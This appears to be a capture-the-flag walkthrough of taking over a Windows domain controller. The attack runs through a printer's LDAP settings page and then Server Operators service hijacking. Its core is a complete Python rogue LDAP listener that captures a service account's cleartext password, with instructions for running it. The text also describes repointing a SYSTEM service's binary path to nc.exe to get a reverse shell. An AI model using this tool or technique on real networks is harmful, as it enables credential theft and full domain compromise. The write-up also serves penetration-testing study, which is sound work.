Enumeration

Nmap

The Nmap scan showed SMB, LDAP, and Kerberos listening, a combination that strongly suggests the target is a Domain Controller. An HTTP port was open as well, which is where the enumeration continued.

00 - nmap output

WEB

Web enumeration turned up a settings page for the printer service that allowed its LDAP server address to be changed. The service authenticated to that server over cleartext LDAP, so whatever credentials it had been configured with were sent unencrypted to whichever host was set as the server.

01 - settings

Exploitation

LDAP Pass-Back Attack

From there, it was straightforward. I followed the guide in this post and successfully carried out an LDAP Pass-Back Attack. The idea is that the printer does not validate the LDAP server it talks to: it performs a simple bind (DN plus password) against whatever address is configured. I started a listener on my machine, updated the server IP in the settings page to my own address, and triggered the connection. Because the bind is a simple bind with no TLS, the credentials arrived in cleartext and I read them straight out of the capture in Wireshark. Two things have to hold for this to work: the listener must actually accept the TCP connection, since the client only sends the BindRequest once the handshake completes, and the printer must be using plain LDAP rather than LDAPS or StartTLS.

02 - listener

03 - my ip

04 - got the password
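The capture step above can be done without Wireshark: a rogue listener that decodes the incoming LDAP simple BindRequest (RFC 4511, BER-encoded) prints the DN and password directly and answers with a BindResponse so the client closes cleanly. The following is an added example, not code from the original write-up or from the guide it links; the DN, password and port are placeholder assumptions, and the constructed sample message stands in for what a printer would send.

```python
"""Rogue LDAP listener for an LDAP pass-back: decodes a cleartext simple
BindRequest (RFC 4511) and returns the DN and password the client sent.
Added example, not from the original write-up."""
import socket


# --- BER helpers -------------------------------------------------------
def ber_len(n: int) -> bytes:
    """Encode a BER length: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag: int, value: bytes) -> bytes:
    """Tag-Length-Value with a single-byte tag."""
    return bytes([tag]) + ber_len(len(value)) + value


def ber_int(n: int) -> bytes:
    """INTEGER; the extra byte keeps the sign bit clear for values >= 128."""
    return tlv(0x02, n.to_bytes(n.bit_length() // 8 + 1, "big"))


def read_tlv(buf: bytes, pos: int = 0):
    """Return (tag, value, position after this TLV) for the TLV at buf[pos]."""
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first < 0x80:
        length = first
    else:
        nbytes = first & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    return tag, buf[pos:pos + length], pos + length


# --- client side: the message a printer sends to its configured server ---
def build_simple_bind(message_id: int, dn: str, password: str) -> bytes:
    """LDAPMessage { messageID, BindRequest [APPLICATION 0] { 3, dn, simple [0] pw } }."""
    bind = (tlv(0x02, b"\x03")            # version 3
            + tlv(0x04, dn.encode())      # name (LDAPDN, OCTET STRING)
            + tlv(0x80, password.encode()))  # AuthenticationChoice simple [0]
    return tlv(0x30, ber_int(message_id) + tlv(0x60, bind))


# --- server side: what the rogue listener does with it -------------------
def parse_simple_bind(data: bytes) -> dict:
    """Decode an LDAPMessage carrying a simple BindRequest; raise on anything else."""
    tag, msg, _ = read_tlv(data)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage SEQUENCE")
    tag, mid, pos = read_tlv(msg)
    if tag != 0x02:
        raise ValueError("missing messageID")
    tag, bind, _ = read_tlv(msg, pos)
    if tag != 0x60:
        raise ValueError(f"protocolOp tag 0x{tag:02x} is not a BindRequest")
    tag, ver, pos = read_tlv(bind)
    if tag != 0x02:
        raise ValueError("missing version")
    tag, name, pos = read_tlv(bind, pos)
    if tag != 0x04:
        raise ValueError("missing name")
    tag, auth, _ = read_tlv(bind, pos)
    if tag != 0x80:
        raise ValueError("not simple authentication (SASL or other); nothing to read")
    return {
        "message_id": int.from_bytes(mid, "big"),
        "version": int.from_bytes(ver, "big"),
        "name": name.decode(errors="replace"),
        "password": auth.decode(errors="replace"),
    }


def build_bind_response(message_id: int, result_code: int = 49) -> bytes:
    """BindResponse [APPLICATION 1]; 49 = invalidCredentials, so the client gives up."""
    body = tlv(0x0A, bytes([result_code])) + tlv(0x04, b"") + tlv(0x04, b"")
    return tlv(0x30, ber_int(message_id) + tlv(0x61, body))


def capture_once(bind_addr: str = "0.0.0.0", port: int = 389, timeout: int = 120) -> dict:
    """Accept one client, decode its BindRequest, answer it, return the credentials.
    Assumes the whole BindRequest arrives in a single recv (true for small binds)."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind_addr, port))   # port 389 needs root / CAP_NET_BIND_SERVICE
        srv.listen(1)
        srv.settimeout(timeout)
        conn, peer = srv.accept()
        with conn:
            creds = parse_simple_bind(conn.recv(4096))
            conn.sendall(build_bind_response(creds["message_id"]))
    creds["peer"] = peer[0]
    return creds


# Constructed sample (not a real capture): hypothetical DN and password.
SAMPLE_BIND = build_simple_bind(1, "CN=printer-svc,CN=Users,DC=example,DC=local", "Pr1nt3r!")

if __name__ == "__main__":
    c = capture_once()
    print(f"[+] {c['peer']} bound as {c['name']!r} with password {c['password']!r}")
```

Run it as root on the machine whose IP you put into the printer's settings page, then trigger the update; if the printer were configured for LDAPS or StartTLS the parse would fail at the first TLV, which is the quickest way to confirm the bind really is cleartext.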

Got The User

05 - got the user

Privilege Escalation

Server Operators Group

Privilege escalation was straightforward: the service account I had was a member of the Server Operators group. Members of that group can start, stop, and reconfigure services, which means they can point an existing service's binary path at an arbitrary command that the Service Control Manager will then launch as the service's own account. I changed the binpath of the VMware Tools service (which runs as SYSTEM) to execute nc.exe with a reverse-shell command line, started a listener, and restarted the service. The service itself reports a start failure, since nc.exe never signals the SCM that it is running, but by then the command has already executed and I had a SYSTEM shell. (I followed this post.) Restoring the original binpath afterward keeps the service working on the box.

07 - privesc start

08 - rev shell

09 - gotcha

Pwned

pwned
